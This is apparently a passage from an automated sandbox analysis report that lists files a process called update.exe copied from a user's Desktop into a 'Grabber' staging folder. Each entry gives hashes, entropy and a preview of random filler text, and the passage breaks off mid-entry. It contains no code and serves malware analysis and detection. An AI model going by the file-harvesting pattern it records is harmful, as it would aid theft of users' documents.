                                                  Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EFOYFBOLXA.pdf

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696178193607948
                                                  Encrypted:false
                                                  SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                  MD5:960ECA5919CC00E1B4542A6E039F413E
                                                  SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                  SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                  SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                  Malicious:false
                                                  Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EFOYFBOLXA\EFOYFBOLXA.docx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696178193607948
                                                  Encrypted:false
                                                  SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                  MD5:960ECA5919CC00E1B4542A6E039F413E
                                                  SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                  SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                  SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                  Malicious:false
                                                  Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EFOYFBOLXA\GIGIYTFFYT.jpg

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.7020597455120665
                                                  Encrypted:false
                                                  SSDEEP:24:Yyd0vLZv9GwBegFWbhTY2P2m1O278kZUU3ZjGaIv:YhLZugsbh0m1bYUpjG9
                                                  MD5:47F4925C44B6916FE1BEE7FBB1ACF777
                                                  SHA1:D7BFAEF09A15A105540FC44D2C307778C0553CE5
                                                  SHA-256:62FB407C253C01957EB5C9ED8075E409FD399C065B6478E5080FDC8573A1AED8
                                                  SHA-512:6B4870B47569942B119533F4C519498D2E7D76FBBD36EC9CAE219BE800864CFA47FC65C98FDDA7D92C0B52F1EA381D7C3D5DC4DE204ABF04CED7F6C43004C1B8
                                                  Malicious:false
                                                  Preview:GIGIYTFFYTJMXILDVGFXDVEFQCHNFYFEULLQEETZRJVMRRJHJRTSPPAOMDMYNAGWNEBMIDVTHKVEEQISBNMPHNFVYDEIXBDPFHYTCLNZABIXDFYKJDBRYRTWDLZOXHMMCFSILUYMHVQPPEGCEUDABQUBALGXBEBBTFQFPGZCSFMMFCTBAMXKOPCAJHDRXWLGLWELWIKNGHWJKDKBDVZPNHUCSZFTPSDHZOUUHUWDVSEAQXIDUUMNXESGKGQYYBWVWCBVILKQLVAXNHJSZYYZUWKUTBRCTNQQXVQCKHLEJIFZFWACZEFAUJYVSEGBIHIZRMKJYWHTJECURPVKKWUKKOFVGYEOSDEDBUWBYBNHTAOSHDXDTPIWBWQANBSHMKUUHFNTKLQLSWCOLNGFZPIBZTKTDJTYYNNHDUOZEFWBJRQDBJTCXGDSCYEYJCUVSMWPBPZCBDOMCVGPOYMXSQANNOXIQBZMOMUCJZXAGIICUFLFDZJOBTEGSAQHEIBBWATDCJXSEIADCNGGARMLYLRJZSIBRRPFAORVDSNHOQWANXTRGLRQZZTEROQRQYBPGYXMSIGOYQMJDIJSQBFLNMQOGKOFUQVIWNLZBQMUSTEPCUCGVOFNLQMYFHDEDLGEYXHBHQNMKSASMZZEYCWBNZKYTKNRWJBUJJTXRIHTHPKRBWIFFKIBKCVEEYOHLCOOBFBXELQKMEOTDDLPFFLMCBOAJRNITAVONLYXBCYITNNXEUAVAVDHVGOGFHPXZDZUUQPRYTGQIFNRRHVDFAGSLTNZENPMFBPWMOHFFCIEPUUGBVHDOBSRPRHEPPLYLJUVAKAYIJRZKMAKRPYDSBIZTPWQFSZBWKYUIQXRDRUUPAWFEQRHVNMAPCFIPTHYPQPAZQNEACARWXUWSRKGERYPPRVAAPAVQYFCPYCRXLJQAMPXGLECYIZDRHPEMJPTXFOJABHMNZZHXHBCYXJEKEEQGKOAGJVHRWOSVEPEFFHDAVPR

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EFOYFBOLXA\JDDHMPCDUJ.png

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.687055908915499
                                                  Encrypted:false
                                                  SSDEEP:24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
                                                  MD5:94EDB575C55407C555A3F710DF2A8CB3
                                                  SHA1:3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
                                                  SHA-256:DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
                                                  SHA-512:F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
                                                  Malicious:false
                                                  Preview:JDDHMPCDUJFORBKGTIFQHFPQNEKFAIHGBDYZBWNZMVTSZXTGRUOCZPQRXMGXBNMAHGODCTVNAHQHZMJYIYXLTVDMEAVEXSWFQCDVPRSSLREITYMWHUXVVKLPJXQJOHYPAVYXSIMBBOTIWYDKNCDVKZZMEIFEDNNXHAHMYLPOUGNKMPZVDEQRUPZBQCKZDQINFECCUZINROAFGLIAMVWHXPPXOWZMWTITWBJFIENEHRXRHRPVUAIUAJUYDBBSQQMTJJXOAAMHVKJEOIQRSNKKQSGCHAUKUYPJEBZIGZTVKUXZEQOUSZPQBHKFHECDNFGTGIDHSJFVLAKZPDYVJVWECRIKKUCCFNNHBLBFCJEKSUZTITTTLQVOHKFHXFIIYDOZNAIBCDIRXJAYKHCOEXBOGSGEGGQEMHFXIZREOFZJSAFXTGSSZLVKYOANMZNPNESDZMFYWTZHIKUSMZXACWZEIMGTFRSZCGICPOSTZRECQYWZECQVLAWXESWPCDXLHIMJHSZJSDAXNXHETAWLZDXTZAPKBHSMKMYYGVSJCUIJSIFUHHMPIRBASPUOUXKKPQCECQBBZUSIXEOXLFFSQIFCTAIRASCMWEHFOXGEJRXFGJODUTKITHEAKFFJQTQNWWKXXDELWDHHEDWUTMSLXQJPVGOBKELYSRBQFYKXFHWGSCVLTCFKOEJMLUXIZVDPFHXHTSMTDRTVCNLISGJFVQRUTMZDYPUYBAEASZCSEUVHWRIQDEJIZQQHJNTIIICFMMPVLXOIVTPCTDKFPDVWXSBXZDXFUMBJTJMKOOHIMIOAKEJSIDIOJSRMRYXLDVGDBBYXARBNHXOXMBXYOTEFOAXRAUKXTWKYYGWNAHHCIIKQHYAETGBWABTEMJKNTEUQAWGHRIKDGGNHUIVVPPYPYTZERZKDPLUSIKPBDPJOCBYQJDEKAVQKHFTPBZJQOUCVBHAHZZGEXOCYGYDCZICBOETRSJSMVEZKINDRIKZYTUIS

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EFOYFBOLXA\PALRGUCVEH.xlsx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696508269038202
                                                  Encrypted:false
                                                  SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                  MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                  SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                  SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                  SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                  Malicious:false
                                                  Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EFOYFBOLXA\ZGGKNSUKOP.pdf

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6959554225029665
                                                  Encrypted:false
                                                  SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                  MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                  SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                  SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                  SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                  Malicious:false
                                                  Preview:ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EIVQSAOTAQ.png

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.692024230831571
                                                  Encrypted:false
                                                  SSDEEP:24:RXklo22NBtmSOCPX4hQpKZCuvImjwxwo1:v22NBtxOCYQ0EuwmMxz
                                                  MD5:086908C2D2FAA8C9284EAB6D70682A47
                                                  SHA1:1BCA47E5FFEC5FD3CE416A922BC3F905C8FE27C4
                                                  SHA-256:40C76F418FBB2A515AF4DEC81E501CEB725FD4C916D50FCA1A82B9F5ABC1DCCF
                                                  SHA-512:02C48E3CDA1DC748CD3F30B2384D515B50C1DFD63651554AD3D4562B1A47F5446098DCED47A0766D184DDB30B3F158ABEC5877C9CA28AB191CEBB0782C26B230
                                                  Malicious:false
                                                  Preview:EIVQSAOTAQGMTJLIEKHIWADNDLJLEWUUXVGOFMOKPHABQUHVNBFVSKQIGVIHICGEEXRLSTKQNZUKOHPLLTCYQSLQJMPWPWNUJFUONDXMYCCUPDUBYMPUSUKUOWWSWDLZMDWKNMUKNPKBXAJATSGOQUAMHMZDCDDJRHKOUEDMLSCIOXAHAUFDQKBUBESAKMMFMHDLSSVUQLOZXARPGPMGAAKVDEITBYGGXWIGUIJRVXQOBOIOJWPYSPHZBHWQTMDCUFCWBQSAZNRUOPCLATAERLBPATETXMFUGXBEGMNPKKEZVSRLCYPFEPWIAEINAMGSOXLYWMUKYSQACPSUTGHDCTFLXKAMLOCGYHCMAETHVZNZOCWWUHYAPHFILDNLLBMLSLXIMOFGWTDVLWPHHRGGAWSIGNXEJRIBIBLWFBUASCLZPUIVDERXYLWTNLLRLTFZJTTDGFOEYPFXIPHFKEXHOGEHSFYCCCTGNFQFYETBADKAEAOXYXJWDJWNZPEOBJZTKPLJPPMICDOWUIVDKBQQMHETDORVKZPOWTAZRBAQYYQHBNHIWFZXBILGKHZBLSQJJEIYBHUIDAOEXERQEUMMKBWDXSMLJVAZJQPZARLOBNSTUDCVKLCVBPTKTJWSMPMKSFOQPINFTNEGPVSYCWOXABSGFFKRQDFQEIJWDUMZKILALUHYQZGZOLYMKSAOZGUYCKJOJLYINHVKCTZVXLYIYPGOQZQQAGXVWEBSURTQECDRXYKQAJBEKDNSIHNBZCUBIKPKVWLUOFFCIZSKQBAAPGFMBASMUOKLLGWEHHMYDJCOQEKOBYLYWOOZLBASOJJYLIHZKUGUKHZQBIAVUPYHYEWAYGUFNARHCUKTFMLHSFLRVAELAFCQHPEFUSGNONWLLYQVUVSVEKHDRXJHDSSFJATGDRCTMICJWPFPKKLXECKUXREXEAQNPOBPRKFYRWIWXEWLAPUSHGKXWYYIJNUMGQHBJPMOYZIXPGOJLOQG

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EOWRVPQCCS.jpg

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.692990330209164
                                                  Encrypted:false
                                                  SSDEEP:24:NCzz4hMQMxH70HULgnraTryj1S0KEX64u+O572j79DwzpnQf8A:axH70cauYS0k4u+O125wtnm8A
                                                  MD5:DD71B9C0322AD45992E56A9BCE43FE82
                                                  SHA1:60945B6BC3027451A2E1CFA29D263A994F50E91A
                                                  SHA-256:19AC62FD471E562088365029F7B0672623511CF3E58F2EF6DE1A15C14A2E94E7
                                                  SHA-512:86EA2B42FEB542977FCF534B4708F7A07E09F4ACC413307E660B905408BC4AA9E26C50E907FA02379EA3EBFD18C532CC9DC269B6EA5994E3290082E429CAAE03
                                                  Malicious:false
                                                  Preview:EOWRVPQCCSGUYRPSSKREBPXVQXUWKHGDIJHLBLYMXTIUESLNTSFMRJGDSQHOWECQAJMENKQNNWPVETUPWMXJTCUIAKPCZEENXVLTKYPKROZPDEBFNAJOVCNEXQJFUHQCMLNHGMRJJIPLOMWFWJKKXSTRHWFVLVQPEMFBLDTSCCSXADJIIDQIYCEGSDEDZDWUEJLTYJHMYEHHMBFZCRDHXZVPESWNDGUEFQZTJFSJVKZMWREMIZGAIZANQJKWWXITTXHDQDZOEOGKCEMDUUBDTMNWBRSOWEKQXQDCYJXERQRAMVQCWCTYJPEAJUAWNBRQWGFJAHXJJFRYTZMSGCREPRECKHXXMJGSQEKUCUNCWUAAPBWQVSMWCJGYSLPHJJHJGXSMNLNICJMSGSWRKARHMQXLYSAOPDAPXSMORZLUWYOQTJQNKSCAJWRUEYRFPNOVSMNYRKMTSGRIFLOAJUGJYDTLINOTCEADKRENVYNODFSIJGSDCICIDXZTLLSKKJQSOHYTZRBSHPHXWZOOSKQIRSGPTAOQPBVJAMXOGPYNJMJXAKCTMRRTFCBPOAMNJORWRNZOGZMNBVCCZYQPOQOUXBGKNLFSQWAWEREFQBRDLTVHEFNRUSOARHJPRECDRMPANZRBGCANIUWEBUDVWLYHFTPGBHSZBZBEFUWFHUZPJOVMHGSINZWDUKWPGMGSNSSJNOMETOCJILXRQRGZQFAJCWYQEENIZIMHRBTZUYEOKCQXYLWCKFHOHCOVRVPNTEUARVJEFALBUVYXIYZRMGJWZNYNLPYHZSSCODVXZBIWXIOAVMGMPKCPYIFZIKWRIHNIYASXZLMOLNZOMMYUSCRZBCXRANWWODLPHCXXDPLNYLMHYIUYZJWQLECFNXQEERYDVDBPXOLGZLZQCVYUYKFZGKXWVDQANPXQYAATYFJALGENVLDMHDASWKNNXODUHLXYGCBUKEFWISCCUWXNUNETWMTQHQDJMAXNPFPLMPQO

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\GIGIYTFFYT.jpg

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.7020597455120665
                                                  Encrypted:false
                                                  SSDEEP:24:Yyd0vLZv9GwBegFWbhTY2P2m1O278kZUU3ZjGaIv:YhLZugsbh0m1bYUpjG9
                                                  MD5:47F4925C44B6916FE1BEE7FBB1ACF777
                                                  SHA1:D7BFAEF09A15A105540FC44D2C307778C0553CE5
                                                  SHA-256:62FB407C253C01957EB5C9ED8075E409FD399C065B6478E5080FDC8573A1AED8
                                                  SHA-512:6B4870B47569942B119533F4C519498D2E7D76FBBD36EC9CAE219BE800864CFA47FC65C98FDDA7D92C0B52F1EA381D7C3D5DC4DE204ABF04CED7F6C43004C1B8
                                                  Malicious:false
                                                  Preview:GIGIYTFFYTJMXILDVGFXDVEFQCHNFYFEULLQEETZRJVMRRJHJRTSPPAOMDMYNAGWNEBMIDVTHKVEEQISBNMPHNFVYDEIXBDPFHYTCLNZABIXDFYKJDBRYRTWDLZOXHMMCFSILUYMHVQPPEGCEUDABQUBALGXBEBBTFQFPGZCSFMMFCTBAMXKOPCAJHDRXWLGLWELWIKNGHWJKDKBDVZPNHUCSZFTPSDHZOUUHUWDVSEAQXIDUUMNXESGKGQYYBWVWCBVILKQLVAXNHJSZYYZUWKUTBRCTNQQXVQCKHLEJIFZFWACZEFAUJYVSEGBIHIZRMKJYWHTJECURPVKKWUKKOFVGYEOSDEDBUWBYBNHTAOSHDXDTPIWBWQANBSHMKUUHFNTKLQLSWCOLNGFZPIBZTKTDJTYYNNHDUOZEFWBJRQDBJTCXGDSCYEYJCUVSMWPBPZCBDOMCVGPOYMXSQANNOXIQBZMOMUCJZXAGIICUFLFDZJOBTEGSAQHEIBBWATDCJXSEIADCNGGARMLYLRJZSIBRRPFAORVDSNHOQWANXTRGLRQZZTEROQRQYBPGYXMSIGOYQMJDIJSQBFLNMQOGKOFUQVIWNLZBQMUSTEPCUCGVOFNLQMYFHDEDLGEYXHBHQNMKSASMZZEYCWBNZKYTKNRWJBUJJTXRIHTHPKRBWIFFKIBKCVEEYOHLCOOBFBXELQKMEOTDDLPFFLMCBOAJRNITAVONLYXBCYITNNXEUAVAVDHVGOGFHPXZDZUUQPRYTGQIFNRRHVDFAGSLTNZENPMFBPWMOHFFCIEPUUGBVHDOBSRPRHEPPLYLJUVAKAYIJRZKMAKRPYDSBIZTPWQFSZBWKYUIQXRDRUUPAWFEQRHVNMAPCFIPTHYPQPAZQNEACARWXUWSRKGERYPPRVAAPAVQYFCPYCRXLJQAMPXGLECYIZDRHPEMJPTXFOJABHMNZZHXHBCYXJEKEEQGKOAGJVHRWOSVEPEFFHDAVPR

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\GRXZDKKVDB.jpg

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.697358951122591
                                                  Encrypted:false
                                                  SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                  MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                  SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                  SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
